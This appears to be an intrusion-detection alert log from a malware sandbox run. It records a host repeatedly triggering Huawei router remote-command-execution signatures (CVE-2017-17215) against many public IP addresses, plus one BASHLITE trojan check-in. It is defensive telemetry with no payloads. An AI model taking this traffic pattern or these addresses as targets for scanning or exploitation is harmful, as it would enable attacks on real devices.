                                                        06/13/24-21:32:28.043211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931837215192.168.2.14197.147.202.156
                                                        06/13/24-21:31:56.092315TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)399944554192.168.2.14103.82.38.94
                                                        06/13/24-21:32:28.043409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669037215192.168.2.1441.81.41.86
                                                        06/13/24-21:32:30.096315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035837215192.168.2.1441.215.176.90
                                                        06/13/24-21:31:59.177495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952837215192.168.2.14156.144.57.76
                                                        06/13/24-21:33:13.231862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523637215192.168.2.14197.211.55.81
                                                        06/13/24-21:32:38.302253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941037215192.168.2.1441.64.39.192
                                                        06/13/24-21:32:05.370433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846037215192.168.2.14197.164.49.241
                                                        06/13/24-21:33:04.987476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879037215192.168.2.14197.89.186.98
                                                        06/13/24-21:33:11.156304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314637215192.168.2.14197.176.61.4
                                                        06/13/24-21:32:44.475714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783837215192.168.2.14197.50.90.165
                                                        06/13/24-21:32:58.842709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673637215192.168.2.14197.152.3.159
                                                        06/13/24-21:32:13.546096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575637215192.168.2.1441.200.64.141
                                                        06/13/24-21:33:15.253266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574437215192.168.2.14156.120.170.245
                                                        06/13/24-21:32:23.942034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905637215192.168.2.14156.106.184.209
                                                        06/13/24-21:32:05.343744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734237215192.168.2.14156.154.140.41
                                                        06/13/24-21:33:00.870887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515637215192.168.2.1441.76.163.11
                                                        06/13/24-21:32:32.150789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.14156.121.136.180
                                                        06/13/24-21:32:52.654679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321837215192.168.2.14156.198.140.6
                                                        06/13/24-21:32:28.028075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384237215192.168.2.14156.163.244.251
                                                        06/13/24-21:31:57.132036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936637215192.168.2.14197.31.78.122
                                                        06/13/24-21:32:17.696537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125637215192.168.2.14156.170.112.58
                                                        06/13/24-21:32:38.301355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010437215192.168.2.14197.12.129.208
                                                        06/13/24-21:32:17.674645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830637215192.168.2.14197.111.143.248
                                                        06/13/24-21:32:58.844142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009437215192.168.2.14156.180.2.221
                                                        06/13/24-21:32:52.660324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589837215192.168.2.1441.179.7.243
                                                        06/13/24-21:32:09.437480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587837215192.168.2.14156.119.147.98
                                                        06/13/24-21:32:56.755554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296037215192.168.2.14197.181.46.73
                                                        06/13/24-21:33:15.258789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284437215192.168.2.14156.243.115.206
                                                        06/13/24-21:32:30.095429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499837215192.168.2.14197.101.255.135
                                                        06/13/24-21:31:57.132502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035637215192.168.2.14156.27.162.36
                                                        06/13/24-21:33:00.868268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267237215192.168.2.14197.235.150.68
                                                        06/13/24-21:32:13.546458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023237215192.168.2.1441.220.226.172
                                                        06/13/24-21:33:07.042013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095837215192.168.2.14156.85.217.109
                                                        06/13/24-21:32:11.487642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976037215192.168.2.14197.120.222.20
                                                        06/13/24-21:32:17.697251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023837215192.168.2.14197.18.90.168
                                                        06/13/24-21:32:23.834765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842237215192.168.2.1441.206.19.139
                                                        06/13/24-21:32:07.416576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100037215192.168.2.14197.213.42.81
                                                        06/13/24-21:32:17.671405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006037215192.168.2.14197.76.0.2
                                                        06/13/24-21:32:21.781194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034237215192.168.2.14197.125.216.42
                                                        06/13/24-21:32:34.215640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779837215192.168.2.1441.21.165.87
                                                        06/13/24-21:32:38.304429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618437215192.168.2.14197.30.22.125
                                                        06/13/24-21:32:34.215964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971637215192.168.2.14156.184.138.170
                                                        06/13/24-21:33:07.057433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937637215192.168.2.14197.91.63.144
                                                        06/13/24-21:32:01.240460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660037215192.168.2.14197.250.137.31
                                                        06/13/24-21:32:42.407753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689437215192.168.2.14156.7.60.9
                                                        06/13/24-21:32:48.572214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116037215192.168.2.14197.238.59.239
                                                        06/13/24-21:32:40.376038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690837215192.168.2.14197.2.250.188
                                                        06/13/24-21:32:13.569145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335237215192.168.2.1441.99.248.200
                                                        06/13/24-21:32:11.485850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795037215192.168.2.1441.43.35.0
                                                        06/13/24-21:33:15.272579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619837215192.168.2.14156.113.68.169
                                                        06/13/24-21:31:57.092072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552837215192.168.2.1441.203.92.245
                                                        06/13/24-21:32:46.508720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825837215192.168.2.14156.15.235.60
                                                        06/13/24-21:32:32.153214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804237215192.168.2.14156.141.33.135
                                                        06/13/24-21:32:28.024315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433637215192.168.2.1441.165.119.166
                                                        06/13/24-21:32:05.368896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256237215192.168.2.14156.71.151.89
                                                        06/13/24-21:33:17.309270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174437215192.168.2.1441.34.160.57
                                                        06/13/24-21:32:05.344454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443837215192.168.2.14197.75.16.75
                                                        06/13/24-21:32:42.421690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762437215192.168.2.14197.165.250.202
                                                        06/13/24-21:32:48.568792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659037215192.168.2.14156.215.130.239
                                                        06/13/24-21:33:09.107112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966437215192.168.2.14197.21.106.183
                                                        06/13/24-21:31:59.194797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311037215192.168.2.1441.112.54.198
                                                        06/13/24-21:33:13.213232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859837215192.168.2.14197.124.66.214
                                                        06/13/24-21:32:13.567841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768637215192.168.2.14197.174.105.220
                                                        06/13/24-21:32:25.995350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391837215192.168.2.14197.19.71.141
                                                        06/13/24-21:33:13.227136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199237215192.168.2.14156.107.103.52
                                                        06/13/24-21:33:11.159211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687037215192.168.2.14197.63.5.155
                                                        06/13/24-21:33:09.107330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101037215192.168.2.1441.253.222.196
                                                        06/13/24-21:32:42.421486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419237215192.168.2.1441.227.147.88
                                                        06/13/24-21:33:15.277300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812637215192.168.2.14197.57.3.107
                                                        06/13/24-21:32:05.344589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491237215192.168.2.14197.173.216.235
                                                        06/13/24-21:32:32.150244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020237215192.168.2.14156.72.211.247
                                                        06/13/24-21:31:57.153610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702837215192.168.2.14156.182.28.169
                                                        06/13/24-21:32:09.439565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737037215192.168.2.1441.43.233.97
                                                        06/13/24-21:32:58.823357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687637215192.168.2.14156.167.252.110
                                                        06/13/24-21:33:15.274887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.14156.142.223.8
                                                        06/13/24-21:32:23.832038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668237215192.168.2.14197.32.239.184
                                                        06/13/24-21:33:00.868217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405637215192.168.2.14197.51.179.188
                                                        06/13/24-21:32:38.316083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547437215192.168.2.14197.236.150.246
                                                        06/13/24-21:33:09.091567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054037215192.168.2.1441.255.148.129
                                                        06/13/24-21:33:15.270642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825837215192.168.2.14197.137.4.189
                                                        06/13/24-21:32:11.509005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256837215192.168.2.14197.199.168.37
                                                        06/13/24-21:32:46.528289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379637215192.168.2.14156.125.103.52
                                                        06/13/24-21:32:15.610531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987837215192.168.2.14156.235.37.200
                                                        06/13/24-21:33:02.914186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550237215192.168.2.14197.243.26.228
                                                        06/13/24-21:32:09.457322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444037215192.168.2.14197.52.113.236
                                                        06/13/24-21:33:05.011413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637637215192.168.2.1441.173.19.216
                                                        06/13/24-21:32:25.975141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404437215192.168.2.14156.44.145.126
                                                        06/13/24-21:32:07.403813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6039437215192.168.2.14197.211.186.212
                                                        06/13/24-21:32:54.707511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473437215192.168.2.14156.233.215.18
                                                        06/13/24-21:33:05.013029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5749237215192.168.2.1441.63.77.229
                                                        06/13/24-21:32:30.096257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428437215192.168.2.14156.229.107.45
                                                        06/13/24-21:33:15.254913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637437215192.168.2.14156.136.200.181
                                                        06/13/24-21:32:36.262789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741637215192.168.2.1441.216.143.243
                                                        06/13/24-21:32:15.609004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579237215192.168.2.1441.29.131.7
                                                        06/13/24-21:32:58.823811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247037215192.168.2.14197.51.120.133
                                                        06/13/24-21:33:02.937476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144437215192.168.2.14197.134.222.86
                                                        06/13/24-21:32:09.454035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932637215192.168.2.14156.120.10.52
                                                        06/13/24-21:33:00.870319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203037215192.168.2.14156.243.96.3
                                                        06/13/24-21:32:52.677203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457637215192.168.2.14197.76.38.186
                                                        06/13/24-21:33:15.252640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438437215192.168.2.14156.91.148.147
                                                        06/13/24-21:32:38.298398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860837215192.168.2.1441.87.181.148
                                                        06/13/24-21:33:04.991411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869237215192.168.2.14197.67.193.174
                                                        06/13/24-21:32:19.749841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639037215192.168.2.14156.123.78.173
                                                        06/13/24-21:33:11.181844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543237215192.168.2.14156.50.244.61
                                                        06/13/24-21:32:03.305823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606037215192.168.2.14156.198.37.143
                                                        06/13/24-21:32:11.505409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679037215192.168.2.1441.61.201.60
                                                        06/13/24-21:32:42.403640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780837215192.168.2.14156.221.200.152
                                                        06/13/24-21:32:48.553849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972637215192.168.2.1441.84.5.129
                                                        06/13/24-21:33:07.042504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314237215192.168.2.1441.127.67.177
                                                        06/13/24-21:33:15.259439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418237215192.168.2.1441.162.194.248
                                                        06/13/24-21:32:13.546377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708037215192.168.2.1441.83.115.177
                                                        06/13/24-21:32:23.830689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520237215192.168.2.14156.81.168.190
                                                        06/13/24-21:33:02.914813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946237215192.168.2.14197.79.206.66
                                                        06/13/24-21:32:38.316948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844637215192.168.2.14197.141.149.150
                                                        06/13/24-21:32:48.571711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642237215192.168.2.14156.221.135.168
                                                        06/13/24-21:32:21.800648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560437215192.168.2.14156.225.233.45
                                                        06/13/24-21:32:03.279974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056037215192.168.2.14197.93.242.33
                                                        06/13/24-21:32:28.027099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302037215192.168.2.14197.49.79.173
                                                        06/13/24-21:32:07.416735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636437215192.168.2.14156.95.175.129
                                                        06/13/24-21:32:17.697728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283237215192.168.2.14156.23.251.122
                                                        06/13/24-21:33:13.213189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655637215192.168.2.14156.32.67.135
                                                        06/13/24-21:32:48.567897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914437215192.168.2.14197.183.193.103
                                                        06/13/24-21:33:09.088948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829037215192.168.2.1441.150.31.85
                                                        06/13/24-21:32:19.728732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765037215192.168.2.14197.226.22.167
                                                        06/13/24-21:32:19.730698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571637215192.168.2.14197.18.247.148
                                                        06/13/24-21:31:59.174094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516237215192.168.2.14156.17.97.42
                                                        06/13/24-21:33:09.108149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014037215192.168.2.1441.88.216.104
                                                        06/13/24-21:32:48.573490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604037215192.168.2.14156.240.125.211
                                                        06/13/24-21:32:34.192136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302837215192.168.2.1441.232.178.42
                                                        06/13/24-21:32:09.458595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066637215192.168.2.14156.95.226.206
                                                        06/13/24-21:32:25.994620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946237215192.168.2.1441.227.57.220
                                                        06/13/24-21:32:42.423554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294037215192.168.2.1441.7.168.16
                                                        06/13/24-21:32:58.820944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960437215192.168.2.14156.228.0.60
                                                        06/13/24-21:32:30.128952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136437215192.168.2.14156.239.0.104
                                                        06/13/24-21:32:01.223946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570037215192.168.2.14197.24.35.193
                                                        06/13/24-21:32:46.503450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782837215192.168.2.1441.27.62.138
                                                        06/13/24-21:32:13.566622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616837215192.168.2.1441.49.73.13
                                                        06/13/24-21:32:05.350062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553637215192.168.2.1441.187.49.243
                                                        06/13/24-21:32:13.566970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727037215192.168.2.1441.123.130.11
                                                        06/13/24-21:33:04.992052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538837215192.168.2.1441.138.227.1
                                                        06/13/24-21:32:36.245758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.14156.22.14.9
                                                        06/13/24-21:33:15.259155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157837215192.168.2.14156.68.188.52
                                                        06/13/24-21:32:30.097800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785637215192.168.2.1441.42.5.219
                                                        06/13/24-21:31:57.134530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326237215192.168.2.14197.115.242.159
                                                        06/13/24-21:32:25.975204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879237215192.168.2.1441.42.82.139
                                                        06/13/24-21:32:25.972742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565237215192.168.2.14197.16.170.75
                                                        06/13/24-21:32:46.509902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.14156.121.90.243
                                                        06/13/24-21:33:09.091048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809837215192.168.2.14197.147.38.238
                                                        06/13/24-21:33:07.042614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428237215192.168.2.14197.151.204.76
                                                        06/13/24-21:32:17.697053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083437215192.168.2.14156.110.41.29
                                                        06/13/24-21:33:07.040720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413637215192.168.2.1441.224.253.81
                                                        06/13/24-21:32:54.710921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816837215192.168.2.1441.198.253.99
                                                        06/13/24-21:33:02.952411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800837215192.168.2.14156.188.232.40
                                                        06/13/24-21:31:57.091427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062037215192.168.2.14156.109.2.30
                                                        06/13/24-21:32:50.615110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000237215192.168.2.1441.159.192.186
                                                        06/13/24-21:32:42.422275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822837215192.168.2.14156.197.168.178
                                                        06/13/24-21:32:56.790190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551437215192.168.2.1441.196.67.119
                                                        06/13/24-21:33:09.130392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555437215192.168.2.1441.213.89.2
                                                        06/13/24-21:32:03.275137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891437215192.168.2.1441.165.251.84
                                                        06/13/24-21:32:40.359291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899237215192.168.2.1441.118.118.65
                                                        06/13/24-21:32:52.671337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561037215192.168.2.14156.150.239.3
                                                        06/13/24-21:32:05.349373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540837215192.168.2.14197.58.133.152
                                                        06/13/24-21:32:15.632518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970437215192.168.2.14197.244.247.131
                                                        06/13/24-21:32:56.785879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320837215192.168.2.14197.103.173.145
                                                        06/13/24-21:31:57.093735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682237215192.168.2.14197.116.225.223
                                                        06/13/24-21:32:48.572827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746637215192.168.2.14197.163.186.24
                                                        06/13/24-21:32:21.783425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3461837215192.168.2.14197.22.230.74
                                                        06/13/24-21:32:23.833602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791237215192.168.2.14156.78.65.94
                                                        06/13/24-21:32:30.101266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815637215192.168.2.14156.188.175.94
                                                        06/13/24-21:33:17.310053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370237215192.168.2.14197.191.216.86
                                                        06/13/24-21:32:13.547164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675037215192.168.2.1441.185.82.240
                                                        06/13/24-21:32:25.978121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730237215192.168.2.1441.103.227.73
                                                        06/13/24-21:32:11.487767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362637215192.168.2.14156.53.9.72
                                                        06/13/24-21:32:34.217351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882637215192.168.2.14197.201.66.150
                                                        06/13/24-21:32:40.353874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725037215192.168.2.1441.66.132.241
                                                        06/13/24-21:32:58.822214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516037215192.168.2.1441.253.97.199
                                                        06/13/24-21:33:17.338057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622037215192.168.2.1441.116.105.23
                                                        06/13/24-21:32:56.758425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077637215192.168.2.1441.42.50.40
                                                        06/13/24-21:32:13.546217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5582437215192.168.2.1441.192.220.144
                                                        06/13/24-21:33:15.276165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788437215192.168.2.14156.245.144.104
                                                        06/13/24-21:33:05.017030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887237215192.168.2.1441.172.125.67
                                                        06/13/24-21:32:42.409479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186637215192.168.2.1441.80.101.7
                                                        06/13/24-21:32:46.525538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287237215192.168.2.14156.67.87.37
                                                        06/13/24-21:33:02.913710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669037215192.168.2.14156.175.164.52
